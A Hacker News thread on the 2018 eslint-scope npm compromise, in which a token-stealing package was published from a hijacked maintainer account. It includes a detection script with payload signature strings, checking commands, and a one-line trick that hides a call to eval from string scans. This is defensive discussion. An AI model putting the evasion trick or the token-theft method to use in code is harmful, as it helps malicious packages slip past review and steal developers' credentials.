Postmortem for Malicious Packages Published on July 12th, 2018 (eslint.org)
329 points by ingve on July 12, 2018 | 155 comments



When we heard about this at RunKit this morning, we immediately started writing a script to identify whether any other packages might have been affected. We're in a pretty unique position, since we install every version of every package in a sandbox environment as soon as it is published. The scan is pretty simple (just looking for a few key strings) and designed to catch any pre-discovery propagation. The scan is running as we speak, and we've unfortunately found at least one unreported case. Luckily it seems to be a package that isn't in frequent use, and the way the virus propagated was also pretty bizarre (through `bundledDependencies`).

We've created a GitHub repo to track our progress that you can visit here: https://github.com/runkitdev/eslint-scope-scan

We will immediately file issues on any packages we find the exploit in. We are also open to suggestions for more sophisticated approaches after this initial scan. Additionally, we are internally working on adding some sanity checks to the installation pipeline that might one day catch this sooner (such as monitoring network requests and file modifications during our sandbox install). Please let us know if you have any other ideas.
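If you want to run a similar check against your own machine or mirror, here is a minimal sketch of this kind of string scan (the signature strings are the ones from this incident; the directory layout and file filter are just illustrative):

  // scan.js - recursively search extracted package files for the known payload strings
  const fs = require('fs');
  const path = require('path');

  const SIGNATURES = ['raw/XLeVP82h', 'sstatic1.histats.com', 'c.statcounter.com'];

  function scan(dir) {
    for (const entry of fs.readdirSync(dir)) {
      const full = path.join(dir, entry);
      const stat = fs.lstatSync(full);
      if (stat.isDirectory()) {
        scan(full);
      } else if (stat.isFile() && /\.(js|json)$/.test(entry)) {
        const text = fs.readFileSync(full, 'utf8');
        for (const sig of SIGNATURES) {
          if (text.includes(sig)) console.log('HIT', sig, 'in', full);
        }
      }
    }
  }

  scan(process.argv[2] || 'node_modules');

Obviously this only catches this exact payload; anything obfuscated or even slightly different will sail right past it.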


A log of network requests made on install would be a valuable start. Even if it doesn’t reveal anything actively hostile, I imagine there are plenty of telemetry servers getting pinged and probably some plain HTTP going on (both of which a package may also do at runtime, but that’s a whole other problem).


FYI, I've downloaded all package versions uploaded between 2018-07-12T09:49:24.957Z and 2018-07-12T12:30:00Z (first compromised eslint package upload and key invalidation time), and got no hits for your signature strings in them.


key invalidation time was 2018-07-12 18:42 UTC

How did you produce this list btw?


I'm still not totally clear on that, btw - they claim they invalidated keys created before 2018-07-12T12:30:00Z, but they did it at 2018-07-12 18:42 UTC. I can't decide if that's problematic.

I downloaded the contents of the npm couchdb and did an exhaustive search of version timestamps.
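For a single suspect package, you can also get per-version publish timestamps straight from the registry's "time" field instead of the full CouchDB dump; a rough sketch (the window boundaries below are the ones discussed in this thread):

  // versions-in-window.js <package>
  const https = require('https');

  const WINDOW_START = Date.parse('2018-07-12T09:49:24.957Z'); // first compromised upload
  const WINDOW_END = Date.parse('2018-07-12T18:42:00Z');       // when keys were actually revoked

  https.get('https://registry.npmjs.org/' + process.argv[2], (res) => {
    let body = '';
    res.on('data', (chunk) => { body += chunk; });
    res.on('end', () => {
      const time = JSON.parse(body).time;
      for (const version of Object.keys(time)) {
        if (version === 'created' || version === 'modified') continue; // registry metadata, not versions
        const t = Date.parse(time[version]);
        if (t >= WINDOW_START && t <= WINDOW_END) console.log(version, time[version]);
      }
    });
  });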


They invalidated keys based on when the attack became non-functional (the pastebin was removed at 12:27 UTC). But the window in which other packages could potentially have been similarly compromised runs from the point the attacker first had access to tokens to the point the keys were actually invalidated.


Amazing work! I'll be following along keenly... and glad to know there's an exhaustive approach being taken to figuring out if anything else was affected


The npm team's lack of responsible action here is astonishing, if not surprising. If a token for these very popular packages was compromised, then every user of those packages could conceivably have had their tokens compromised, not just those that have it as a downstream dependency. That means every single package published between the vulnerable packages and the mass token invalidation is suspect and should be unpublished until it can be audited. npm's position that "a very small number" of packages were compromised is minimizing a potentially massive issue. Their promise to "[conduct] a deep audit of all the packages in the Registry" both misses the point and is ineffective.

I have come to expect no less from npm, and by extension, nodejs.


NPM revoked all tokens. How is that irresponsible?

https://status.npmjs.org/incidents/dn7c1fgrr7ng


For one, they've marked the issue as resolved before they've completed any forensic analysis to discover if additional compromised packages were uploaded with stolen credentials during the window in which they weren't revoked.

This gives a false sense that it's safe to install packages again.


And the fact they don't get this is incredibly disconcerting.


There's also no systemic fix for this issue. Next week, the same thing could happen again.

It's time to enforce two-factor authentication for publishing packages.

It's time to publish a roadmap towards package signing and verification.

It's time to talk about sandboxing the install scripts to prevent token theft.

"We're done for the day" is so far from sufficient.


> package signing and verification

You're the first person I've seen mention this, which seems like it should be the first and most obvious line of defense against bad stuff like this. +1


People mention most of these steps every time npm fucks up (which is often).

Package management is a mostly solved problem, but npm refuses to learn from the 30+ years of experience that Linux and other communities have had.


I used to be one of the biggest HN proponents of dunking on Node. I would give it a thrashing second only to the windmill dunks I would line up on Go.

These days, with ES6, TypeScript, and React...it's actually all pretty nice.

But NPM is still and forever a mess that just plain didn't learn from its predecessors--and my only guess as to the cavalier treatment of security issues is that the NPM crew's a bunch of premillennial dispensationalists banking on getting raptured (or bought, I guess, but that's way less fun) before the chickens come home to roost, 'cause just about anything else seems implausible.

I am thinking about getting in on Deno only and strictly because maybe that can have a package management solution that is not held captive by an irresponsible venture-backed entity. It's not like anyone's breaking NPM's grip anytime soon. (Even if you tried, their API is so awful as to be functionally incompatible unless you literally just copy their internal structure, so...yeah. Great. Hooray.)


> ES6, Typescript, React

NodeJS didn't make those - they'd be around with any nodejs alternative.

btw, nodejs should provide some "isolated" mode (ie run as user "nobody-projectName-userName" - eg. "nobody-react-whatcanthisbee") and do some appropriate group permissions.

basic linux permissions can do a lot...


What saddens me is that there seems to be no way out. There are so many projects that worked fine in the past and are now using npm, for example PhoneGap.


Signing packages works well for a linux distro. It's much less clear that it would help for a language package manager: https://caremad.io/posts/2013/07/packaging-signing-not-holy-....


None of the criticisms of package signing here apply in this case. Package signing does cover this exact issue, which we should describe to be specific:

(1) Someone has published a package.

(2) That package has become well known and widely used enough that the community as a whole trusts that the entity publishing it is not there for malicious purposes.

(3) The maintainer of that package has their account compromised, either by a credential leak or by a vulnerability in the package management system itself (in this case, the former and not the latter).

If the package were signed, then the attacker could not have published the fake package that led to today's issues. Does this solve the root chain-of-trust issue of whose packages you should trust? No, but nothing other than thoroughly reviewing every line can do that. Does it prevent you from having a random unknown person masquerade as the maintainer and publish a malicious package? Yes.

There are real additional trust issues to solve, but let's not let those detract from the fact that package signing would have prevented the exact issue which we saw today. Defense in depth, always.
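To make the verification side concrete: it doesn't take much machinery on the client. A hypothetical sketch of what an npm client could do if the registry served detached signatures and the project pinned publisher public keys (none of this exists in npm today; the file names are purely illustrative):

  // verify-tarball.js - hypothetical client-side check of a detached tarball signature
  const crypto = require('crypto');
  const fs = require('fs');

  // in a real design the pinned key would come from something like the lockfile
  const publisherKeyPem = fs.readFileSync('trusted-keys/eslint.pem', 'utf8');
  const tarball = fs.readFileSync('eslint-scope-3.7.2.tgz');
  const signature = fs.readFileSync('eslint-scope-3.7.2.tgz.sig');

  const verifier = crypto.createVerify('SHA256');
  verifier.update(tarball);

  if (!verifier.verify(publisherKeyPem, signature)) {
    throw new Error('tarball signature does not match pinned publisher key; refusing to install');
  }
  console.log('signature OK');

The hard part, as the replies below point out, is key distribution and deciding whom to trust in the first place, not the verification itself.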


I'm not going to say that you're wrong in any particular thing you said. You are correct that package signing would have prevented this exact issue we saw today, and I'm not opposed to an argument for defense in depth.

However, I am going to reiterate my original point with a bit of clarification: "it is not clear that package signing will prevent malicious actors from compromising systems using a language package manager with anything approaching the success of distro package managers".

I think what you're proposing amounts to a two-tier system. There is somehow a set of known signatures that are trusted by the npm consumer[0] and then a vast sea of untrusted signatures. Developers sometimes add libraries, and add one (or more?) signatures to their trusted set.

First, in the specific case of NPM, we have an existing system with huge numbers of transitive dependencies and no existing package signing. I don't see how you retrofit signing onto that system. Too many developers will ignore it, and because there are so many libraries, you'll end up with an absolutely massive number of trusted keys.

Second, suppose you're starting from scratch, so you can enforce signatures from day one. You still have the problem of transitive dependencies. It's certainly more work for a malicious actor to either a) create legitimate libraries that will be included in other libraries, then convert them to malware, or b) steal a developer's signing keys, but neither one is remotely impossible, given the large number of libraries involved. You just need one part of that web of libraries to involve a sloppy or malicious developer, and you are hosed.

[0] Interesting question: how is this handled? Is it part of the lockfile for a project? Something system level, with the problems of devs installing random shit on their machines and ending up with too much being trusted, and also lack of reproducible builds?


That's from the maintainer of PyPI. PyPI shipped SSH Decorator with malware that stole SSH keys. Another case that would have been entirely preventable with package signing. I've concluded they don't know what they're doing either.

I'm not surprised if you don't know about it, because it was [dead] on HN as soon as it was posted... which should tell you a bit about the echo chamber you're in here.

https://imgur.com/gdUFToP


Except none of these comments takes into account the fact that, in practice, no one actually verifies apt package signatures either, and the fairy-tale world where all of this is a solved problem in some other domain simply doesn't exist.

https://blog.packagecloud.io/eng/2018/02/21/attacks-against-...

The reason that package signing never really matters that much is that once you boil the threat model down to either package publishing credentials being compromised or package repository infrastructure being compromised, the form of the credentials is of little consequence in the former case and uninvolved in the latter. The threat is against the client, not intermediates.

The original developer here reused credentials. Nothing in signing protects against that attitude, and it's the same attitude that reuses passwords for signing keys, if the keys get encrypted at all - I'd bet this user has numerous stale SSH keys and never encrypted any of their secrets. Some of the top eslint contributors have multiple short RSA keys on their GitHub. None of them have modern keys.

There are more effective places to invest to better protect users. Auditing infrastructure for example.


The most worrisome attack on that page is the arbitrary package attack, and on my Debian installation it's not feasible. The insecure apt.conf settings are not enabled on Debian by default. Saying that apt's package signing is absolutely ineffective is dishonest.

Note that metadata signing in apt is just indirect package signing: the package sha256 sums are part of the metadata. It looks like dpkg also has support for package signing, but at that point it would be redundant.


This is an obvious ad hominem attack, and it completely misses the point of the PyPI post.

If someone says "this problem cannot reasonably be solved", you don't get to discredit them by saying "look, you had the problem!" You have to actually rebut their arguments and say that it can be solved.


It would have prevented this from happening.


In fact, there's a pull request from 2013 for GPG package verification. It took over a year for a response from NPM, shooting it down. There's already an "I told you so" in the thread.[0]

>Thank you for your time and effort.

Yeah, thanks to you too, NPM. No time or effort to go around for progress on this issue in the interim 3 years, apparently.

[0]https://github.com/npm/npm/pull/4016#issuecomment-76316744


If the hacker has your password, don't they also have the ability to publish a public key used to verify the signed package? It presumably would protect against distribution of a fake package outside of NPM, but if your NPM account is hosed isn't it too late?


If 2fa is enforced, having your password doesn't get you anything. Publishing an npm package isn't having a Twitter account, it's one of those things where enforcing 2fa shouldn't even be a usability question.


how does 2fa work with auto publishing CI pipelines?


Not necessarily. Have NPM store the public key, and require a lot of red tape and time to update it (versioning with delays).

Require multiple keys to sign or vouch for a package before publishing is complete (log of reverse dependencies +1 maybe).

There are lots of options.


I don't think sandboxing install scripts will help much, as any code in the package will be executed when that package is require()'d. You really need to sandbox the whole of `node`.


* eslint gets compromised, and 3.7.2 is published

* eslint user FooCorp also gets compromised, and a similarly-malicious version of foolib-js gets published that includes the _same code_ to steal tokens

* npm invalidates all tokens

* you decide to use foolib-js, and your newly-minted token is now compromised

npm are fucking this up, and royally.


While this is possible, I'm willing to give the NPM team at least a little benefit of the doubt that they actually researched the access logs before they state this:

> We determined that access tokens for approximately 4,500 accounts could have been obtained before we acted to close this vulnerability. However, we have not found evidence that any tokens were actually obtained or used to access any npmjs.com account during this window.[1]

I get that it's possible that other modules could already be infected, but it's also true that other modules could have been similarly infected long before this one.

[1] https://blog.npmjs.org/post/175824896885/incident-report-npm...


Your quote wonderfully illustrates that npm are either being obfuscatory or entirely missing the point.

How did they determine that tokens for 4,500 accounts could have been obtained, and what is that even supposed to mean? The problem here is that any user of these packages could have had their .npmrc file read and exfiltrated, not just some upstream package maintainer. Were there only 4,500 valid npm tokens or something? I cannot imagine that is the case.

So either they looked at 4,500 packages uploaded during the compromise window and they're not explaining how they undertook to do that, or they don't understand the vector and are minimizing the severity of the issue.


I would assume their logs could tell them which tokens were associated with the users that downloaded v3.7.2. npm probably doesn't need credentials to download a package, so the number of downloads is likely higher. Determining which other packages were affected is another matter entirely, and no one can say this attack vector is bounded by this specific date window. This could've been way more widespread, unless they're unpacking payloads and grepping for key pieces of this specific attack.

I think it would be helpful if they could expose some of those logs, but since the meat of what matters is the IP addresses (to verify whether your machine or your CI server was compromised), GDPR effectively wiped that possibility off the table. It would almost behoove them to set up a kind of haveibeenpwned service where you can check against stuff like this in the future. It's not like this can't happen again, as the hole hasn't been closed completely; only this one set of compromised packages appears clean for now.


A malicious change could have already been published somewhere else, couldn't it have? And we just haven't found it yet?


Just saying they didn't do nothing. Maybe they didn't do as well as they could have, but they did do something.


Calling it resolved is worse than doing nothing. If they had done nothing, at least people would know that "If I run npm install now, that's bad". Now they've claimed it is resolved, which tells their users "It's okay to start installing things again" when it isn't safe until an audit has been completed.


You can see a list of all npm packages uploaded between the time that the first compromised eslint package was uploaded and the token invalidation time here:

https://gist.github.com/thenewwazoo/0306aa06aafe7807497ed1db...


To follow up, I've downloaded all of the versions indicated here and none include the strings `raw/XLeVP82h`, `sstatic1.histats.com`, nor `statcounter`, and none of the included `build.js` files contain `eval`. Not an exhaustive test.


Further follow up: I've updated the gist to include all packages between the time at which the first compromised package was uploaded and the time at which the keys were invalidated (which was later than the invalidation threshold). I'm working on auditing the larger (~2000) list of packages now.


Final follow-up: a more-exhaustive search also returned no evals in build.js files, nor any obviously-suspicious strings.


Have you checked for

    \u0065val
or

    e\u0076al
or any other combination of it?


This is impossible in general.

  eval === this[[1,18,-3,8].map(x=>String.fromCharCode(x+100)).join("")]
https://jsfiddle.net/hkvu9s47/


That's the point. Just checking for occurrences of strings like 'eval' gives you a false sense of security.


> That means every single package published between the vulnerable packages and the mass token invalidation is suspect and should be unpublished until it can be audited.

I wonder how many packages in fact got published during that nine-hour time window. Does anyone know what kind of number that would be?


I'm dumping the npm db right now to figure that out.

eslint-scope 3.7.2 was published on 2018-07-12T10:40:00.478Z
eslint-config-eslint 5.0.2 was published on 2018-07-12T09:49:24.957Z
tokens were invalidated at 2018-07-12 12:30 UTC


> tokens were invalidated at 2018-07-12 12:30 UTC

I'm reading it as tokens created before 2018-07-12 12:30 UTC were invalidated, but the invalidation itself happened on 2018-07-12 18:42 UTC according to eslint's post-mortem[1]. I think the latter is the more relevant date.

[1] https://eslint.org/blog/2018/07/postmortem-for-malicious-pac...


If I understand the npm incident report correctly, the answer is none:

> We determined that access tokens for approximately 4,500 accounts could have been obtained before we acted to close this vulnerability. However, we have not found evidence that any tokens were actually obtained or used to access any npmjs.com account during this window.

Source: https://blog.npmjs.org/post/175824896885/incident-report-npm...


The wording is pretty vague, I guess intentionally, but saying "we found no evidence..." isn't as confidence-inspiring as if they'd said "we determined that no...".


  "npm has revoked all access tokens issued before 2018-07-12
  12:30 UTC. As a result, all access tokens compromised by
  this attack should no longer be usable."


"access tokens compromised by this attack should no longer be useable", but tokens compromised by other compromised packages published during the intervening period will still compromise you.


Slightly off topic, but this could happen in any language, not just Node. I saw that Maven does not check PGP signatures.

So, I just finished a Maven plugin that verifies that each artifact in the build has been signed by a pinned PGP key. This now makes it difficult for an attacker to hijack another artifact's namespace.

https://exabrial.github.io/pgp-signature-check-plugin/

I tried to make the code as straightforward as possible, using dependency injection to make testing easy. My hope is that you'll start using this in your open source projects and at your job.


Until a couple years ago Maven didn't even use SSL... The Node ecosystem has its fair share of issues but I think it takes a disproportionate amount of flak.

https://www.infoq.com/news/2014/08/Maven-SSL-Default


It isn't disproportionate given how much the understanding and awareness of security issues advances every year, nor given npm's size and the number of security issues it has already experienced.

Alternatively, we as a community can continue to call it a toy that nobody should trust or use for anything serious, and then the flak isn't disproportionate, since you shouldn't have been using it for anything important anyway - but you can't have it both ways.


I think it's worse here because every damn node project installs 100s if not 1000s of npm packages.


org.simplify4u.plugins:pgpverify-maven-plugin works well for me. But here we are: there are multiple ways to verify package authenticity with Maven, and there aren't even signatures in npm. npm is belligerently against end user security. They won't even accept a pull request if you do the work for them.

https://github.com/npm/npm/pull/4016


Yep, I used that plugin. I made my file format compatible with his intentionally.


Right but node projects tend to use ten billion trivial packages to do anything whatsoever (no standard library!) so the problem does get exacerbated. Moreover, npm has been told multiple times how to avoid this and they did not care.


One further note... The version of Sonatype Nexus that Maven Central is running does not support signing with a subkey, and does not support ECDSA. Unfortunately, the software that needs to be fixed is proprietary.

If someone has a contact at Sonatype, I'd love to talk to them about fixing this.


The source code is at https://github.com/sonatype/nexus-public.

Not sure if Maven Central is running on the closed-source version, though.

> If someone has a contact at Sonatype, I'd love to talk to them about fixing this.

Contact them by email, they're quite responsive.


Thanks. I checked the code out, but it does look like that part is not open source :( I'll email them.


>Before the incident: The attacker presumably found the maintainer’s reused email and password in a third-party breach and used them to log in to the maintainer’s npm account.

Password managers and MFA, people! Please use them. There's never a reason to not use a password manager for every website, application, and service that requires credentials. And MFA isn't everywhere, but for places that support it: use it. Ideally non-phone based if that's an option, to prevent risk of phone number/voicemail-related compromises.


> There's never a reason to not use a password manager

Sage advice. Right until the day that there is a major exploit of a popular password manager.


If you fear a browser extension-based vulnerability (like an XSS vulnerability that allows an attacker to send all of a visitor's passwords to their server), use a native application like KeePass. You lose some convenience, but it's just a few extra steps when logging in and registering.

It's certainly not impossible that some major flaw will eventually be found in KeePass, but it's stood the test of time so far, and it's hard to imagine how it could be mass exploited considering it basically just reads and writes a local AES-encrypted file. Even if someone finds something that lets you completely bypass the encryption (which is very unlikely), they'd still need to gain access to your hard drive (or wherever you're storing the file).

But I'd also say the net security benefit of a lot more people using something like LastPass or 1Password would still outweigh the damage of a future vulnerability.

Either way, there is really no excuse for password reuse in 2018, especially when your password for managing your super popular software package running on an enormous amount of devices is the same as the password to your Harry Potter fanfic forum account or whatever.


I use KeePass and have a local .kdbx file for this reason - imo LastPass and the like are a huge target. This does require a lot more work, since you have to keep the file in sync across your laptop/phone/devices and literally cannot get a password without one of those near you. (I have obscenely overkill settings for encryption and key transformations in case I lose a device and someone tries to brute-force it.)

One thing that is beyond dispute is that a password manager will not reuse or slightly vary the same password, which is what human beings pretty much always do.

Also, some popular ones have integrations for reissuing credentials for major sites. In theory, if there were some huge compromise, you'd change your master key and automatically reissue as many passwords as possible, then focus on the ones in the list that you know have your credit card saved or are essential for other reasons (npm credentials). You also literally have a list to go down at that point anyway. What is the alternative scenario if your 'same password everywhere' password is compromised... try to remember which websites you use, figure out which might be the biggest issue, and manually change every single one?


The attack surface is still smaller. You need one more thing to be broken before this situation happens. If a hacker needed 3 things in place to own you, they now need 4 things. And a password manager exploit is a big 4th thing.


Great advice. I tell people that using a password manager is almost always better than not using one. Pick one that works for you and your devices and just use it.


My password manager is accessed through an SELinux enforced VM without networking. AFAIK this is as secure as I'm going to get (debating the tradeoffs between a VM and airgapped machine) without using Qubes.

But at least, in the event of an exploit, the VM is still without networking.


I guess it may depend on whether you're running on Intel or AMD hardware, i.e. whether the Intel ME stuff has total memory access with its own Minix OS, networking, etc.


The alternative here is password reuse for most people. That's so much worse. Lesser "evil" I'd say.


> Password managers and MFA

You conveniently forgot about the MFA part. The attacker will still need the other factor.


As long as they encrypt the stored passwords and you don't use your master password anywhere else, there's not much that can go wrong.


Unless, say, someone uploaded malicious code to a repo with a dependency the password manager pulls in, which changes that behaviour...

Some code somewhere needs to be able to decrypt all those stored encrypted passwords - that code is a _super_ high value target.

I like/use/recommend/have-paid-for 1Password for 5-6 years now - but I worry that the online and 1Password for Teams implementation - even though I trust the 1Password team to "get it right" - has got to be a really "fun" target for sufficiently motivated and resourced attackers. (If I were sitting round at the NSA looking for a fun project - automated MITM of 1Password traffic at p0wned or backdoored-by-agreement carrier or IX routers, using trusted root CA certs to create legitimate-seeming SSL certs, and on-the-wire JavaScript code injection... I reckon I could sell that to my super-sekrit-PHB as a worthwhile research project. )


I use self-synced standalone 1Password for this reason. Much smaller attack surface.


The browser extensions can provide a big attack surface. But otherwise, you're right.


I use `pass`, which is basically gpg+git+xsel. My user account could be compromised, but it won't be through my password manager.


Well, in the worst-case scenario you're no worse off than before. So this seems like a net win.


> Password managers and MFA, people!

You're preaching to the choir on HN.

This needs to be posted on LinkedIn, Facebook, the *Grams, Imgur, Pinterest, etc.


>You're preaching to the choir on HN.

I would've thought so, but clearly one of the maintainers of eslint-scope didn't follow the advice.


Do you think the ESLint maintainer does not visit HN?


There are lots of technical people that do not visit HN, and there are lots that do. The set of HN users/visitors is not the entire set of technical people.


That's how you get the choir to sing.


The most important lesson here is clear: always turn on MFA if you can, but more importantly, use a password manager. The risk from password reuse is just far too great, and there's no other reasonable way to have unique, strong passwords everywhere. In this day and age, it's irresponsible security practice not to take this step, especially if you're a developer with special access.


I thought the most important lesson here is that npm is a horrible single-point of failure with a terrible security track record and obtuse leadership, but has somehow become the backbone of an entire ecosystem within our industry.


That’s one takeaway. There isn’t an alternative, though, so this isn’t actionable.


No, it is actionable - create an alternative.


> create an alternative

Or maybe just adopt one of the dozens that have been around for longer than NPM in the first place.


Was there ever a real adoptable alternative to npm for node packages? I'm all ears for suggestions.


https://en.wikipedia.org/wiki/List_of_software_package_manag...

There are many, most are open source, several have or could be ported to windows. What does npm offer that couldn't have been handled with an apt or rpm repository?

The obsession with reinventing everything in every language is a giant waste of time.


Please do! I cannot.


Especially maintainers of popular npm packages.

eslint-scope has 500K downloads every day for god's sake.


Other lessons could be taken from this. For example:

When you build a package management system that has user-configurable exec scripts, run them in a secure sandbox/container by default. If you provide an override, require a user to approve it and show them the command that will be run on their system.

If npm package.json scripts only ran in a lightweight linux container with no access to the filesystem, the mere act of doing an `npm install` could not pwn your box.

Another possible takeaway would be that everyone should use Qubes, or some similar project, so that the machine where they use npm doesn't contain any important credentials, with all publishing done in CI or in another Qubes VM dedicated to the purpose, which publishes a shrinkwrapped artifact rather than installing locally.
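For what it's worth, npm already has an `--ignore-scripts` flag that covers the install-time half of this; a minimal sketch of wrapping it (the rebuild step and package name are only illustrative):

  // safe-install.js - install without running any lifecycle scripts,
  // so a malicious preinstall/postinstall never executes on this machine
  const { execFileSync } = require('child_process');

  execFileSync('npm', ['install', '--ignore-scripts'], { stdio: 'inherit' });

  // packages that genuinely need a build step can be rebuilt explicitly afterwards,
  // ideally inside a throwaway container with no credentials mounted, e.g.:
  //   execFileSync('npm', ['rebuild', 'some-native-package'], { stdio: 'inherit' });

It doesn't help with code that runs when the package is require()'d, which is the point made in the sibling comments.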


You don't even need containers on Linux. If SELinux were more accessible, this would be a very cool use case.

You could set the security context of your npm access credentials to something other than unconfined and ensure that only processes with a specific security label can access files tagged with that security context. These security labels in turn are kernel-controlled, so at that point a malicious install script needs to escalate to root in order to steal your credentials.

It's kinda sad how such a powerful and rather simple tool is so hard to use.


While it would be nice to be able to run `npm install` fearlessly, how much would it truly help? In almost all cases, the code downloaded from npm will be executed non-sandboxed anyway; that's probably the reason you installed the package, after all.


Regarding password managers, I feel uncomfortable, especially when it comes to high-value targets like developers of important software.

If you're a potential target for malicious actors, is it a good idea to have a single point of failure for your logins? I certainly see the point about the realities of password reuse, but can we quantify the risks of one approach vs the other somehow?


> is it a good idea to have a single point of failure for your logins?

Just like logging in to 2 SaaSes from the same computer... at which point a keylogger/camera/microphone on or near that computer becomes the single point of failure.

There is a point at which too much paranoia paralyzes a person into inaction. Criticizing people for not defending against nation-state level attacks (eg. Password Manager attacks) when we can't even defend ourselves against the neighbor's son (credential stuffing without 2FA) seems like putting the cart before the horse.


While I really like 1Password - I do in my more paranoid moments wonder if it's become so well known and popular that it's probably a worthwhile target for attackers smaller than nation states?

It's pretty obvious some of the cryptocurrency thefts have been for amounts far in excess of what a seriously talented group would need to consider taking on a password manager...


fwiw a password manager doesn't have to be such a single point of failure.

I use `password-store`, which means to get a password I just need access to my gpg key.

My gpg key lives on 3 yubikeys and in 1 bankvault as a paper backup.

If my main yubikey is destroyed or I somehow forget the pin to it, I just need to go to the bank vault.

If I wanted to err on the side of being more able to access it, I could leave an unencrypted copy of the gpg master key with a trusted friend.

Since there are many password managers with different models, I think it's difficult to quantify exactly the failure mode of each.

However, the reality is almost all security experts recommend password managers, and almost everyone who uses 1password for a while doesn't want to go back.. so clearly there's something to it.

The only people I see doubting are people who have uneasy feelings but haven't really written down their threat model nor consulted security professionals.


The node development environment is bananas.

On the web, executing third-party controlled JS code is considered a profound (XSS) vulnerability, despite browsers being equipped with the strongest sandboxing. Tiny cracks are leveraged into click fraud, cryptocurrency mining, and other nefarious activities.

Meanwhile website build processes indiscriminately pull in random modules and their transitive dependencies. Modules may inadvertently stumble into a core role, like left-pad.

Popular Chrome web extensions get large monetary offers, and npm modules are surely next in line (if it's not already happening).


I don't usually repost the same comment from one story to the next, but this might be helpful...

Here's how I checked my own machine, though I was already confident I wouldn't be affected:

  find ~ -name eslint-scope -exec grep -H version '{}/package.json' \;
If you use yarn exclusively, this will also work:

  yarn cache list | grep eslint-scope-3.7.2


Until all packages published since this incident are reviewed thoroughly, you cannot be confident that you aren't affected if you did an npm install today at all. Other npm package authors likely had their credentials stolen, which could mean their packages had malicious updates too, and so on down the chain. And just because this package "only" exfiltrated npm tokens doesn't mean any follow-on infections published with the compromised tokens use the same script.


I'm even more cynical than you are here.

I think the likelihood of this being the first time a credential-stuffing attack has worked against an npm account is vanishingly small.

While the timeline given makes the response time sound good, it still took a user notification, 90 minutes after the earliest signs of the attack they've found so far, to kick off the response.

I wonder how many npm packages are widely used but under _way_ less scrutiny than eslint?

Memories of the leftpad.js debacle make me suspect the attacker was not nearly as evil as they could have been - if they'd chosen a package that lives way down in the dependency tree of a bunch of popular stuff, but which itself is unlikely to get much scrutiny, this attack might have slid under the radar for a lot longer. (And I've no confidence that this hasn't already happened, possibly multiple times, and this was just a copycat attacker who got "greedy" and foolishly dropped his attack payload onto a popular and heavily scrutinised package...)


> just a copycat attacker who got "greedy" and foolishly dropped his attack payload onto a popular and heavily scrutinised package

On that note, the main reason it was picked up was a bug in the attack itself. If the creator hadn't put the eval inside the .on('data', ...) handler and had instead waited until all the data was received, it wouldn't have thrown the SyntaxError and might have flown under the radar for even longer.


It steals npm tokens, right? Maybe it was done in smaller, less scrutinized packages first and finally hit pay dirt with a big package like eslint. They still don't know how it was compromised in the first place.


Not having done an npm install today at all is why I'm confident.

EDIT: For those who have done an npm install today, I think those commands are still useful and catch the most probable way one could be affected.


Not having done an npm install today _probably_ is grounds for confidence.

It does, though, assume that this discovery is the first time this has ever happened. If _I'd_ been considering doing this attack, I'd almost certainly have trialled it on a less popular package, where a malicious update is less likely to be noticed, before hitting something like eslint.

Also, the postmortem leaves out any details of whether or how they've audited the rest of the repo - sure, they've cleaned up the two packages they know about and revoked some tokens, but I'm not confident they've done the work required to be sure that other packages weren't targeted in this or previous attacks, meaning packages might still be leaking new post-revocation tokens.


More broadly, I think this point touches on the idea that you cannot trust code that you did not write yourself. Ken Thompson's Turing Award speech talks about this (https://www.archive.ece.cmu.edu/~ganger/712.fall02/papers/p7...).


Note that `eslint-scope` and `eslint-config-eslint` were both affected[1], so duplicate this search for both modules.

[1] https://eslint.org/blog/2018/07/postmortem-for-malicious-pac...


As an aside, doing

    find -exec [...] +
(note + instead of \;) will exec one grep process for as many arguments as possible, instead of one grep process per file.


Thanks for adding those commands.


    find ~ -path '*/eslint-scope/package.json' -exec jq -r 'input_filename+": "+.version' {} +
or just

    jq -r 'input_filename+": "+.version' ~/**/**/eslint-scope/package.json


I don't understand how NPM is such a dumpster fire. Countless other languages have used package systems for a decade without constant issues.

I get the feeling pure JS is too dynamic for such a large codebase to be reliable. We switched to Typescript a few years back because of the same issue and I'll never look back.

All our JS/TS projects inevitably end up with rm -rf node_modules as the first build step. This has been a constant since NPM 1.X, and somehow at Node 9.0 it's still needed. I never used another package manager that was so unreliable that you need to delete all your packages just to build.

And the horrific error messages when things get messed up. I would rather debug assembly.

The regular leftpad level circus events are just icing on the cake. Please somebody replace NPM. It's even worse than the constant framework churn


What part of this attack is npm specific?

What feature of typescript would have prevented this?


NPM's not enforcing MFA for committers seems unwise. Also, from the gist of it, this seems like it should have been incredibly easy to catch with basic static analysis. The attack wasn't disguised in the slightest.


Why doesn’t npm extremely restrict public packages?

For instance, file operations could be limited to the root of the project (and never .git), packages could be barred from spawning sub-processes, and HTTP connections could be limited to non-internal IPs.

I’m aware that most of these defenses could be defeated easily by using native modules et al. — but this needs to be dealt with ASAP. There are just too many incompetent people in control of this, and it’s just a matter of time until a company pays big for this kind of horrendous engineering mistake.

(How about an npm module hijacking a Mesos cluster by connecting to a master and deploying a service? We built a PoC of that in a hackathon and it was pretty disturbing how well it worked: running as root on all servers!)


Because UNIX security model ¯\_(ツ)_/¯ Pretty much every modern programming environment involves running arbitrary third party code as "you", with access to all of ~/ and whatnot.

How would you solve that on a package manager level? Static analysis? It's really difficult to make an analyzer that wouldn't be trivially defeated by obfuscation, and wouldn't at the same time have false positives all the time.

Sandboxing at the language runtime (in this case node) level? Theoretically a nice idea, but difficult to implement securely. Java has been trying. Besides the fact that practically no one uses it to isolate third party libraries in server/desktop apps, there were some serious vulnerabilities: https://www.thezdi.com/blog/2018/4/25/when-java-throws-you-a...

An OS level capability-based security model like Capsicum/CloudABI is a better solution, but again — doesn't fit that well with libraries. In Capsicum, you need a process boundary to isolate code, and that implies IPC, which is a thing developers absolutely love to use all the time… (not).

Here's an awesome research idea that I sadly do not have the time to work on: make a programming environment where all shared libraries are actually servers built as CloudABI executables, library calls are actually some super-fast RPC (with e.g. Cap'n Proto to avoid spending time on serialization, and of course fd passing for capabilities), and everything is handled as transparently as possible.

As a bonus, CloudABI solves the OS portability problem. Extra research idea: merge CloudABI with WebAssembly to solve the CPU portability problem as well. End result: same application runs on Linux/amd64 and NetBSD/toaster128, with secure sandboxing for every third party left-pad module.


You don't really need to isolate every library. Really, just every "project" (e.g. I just cloned X from Github).

And that does have process isolation.


Most projects that are typically cloned from github/npm/pypi/rubygems/cargo/whatever are libraries…


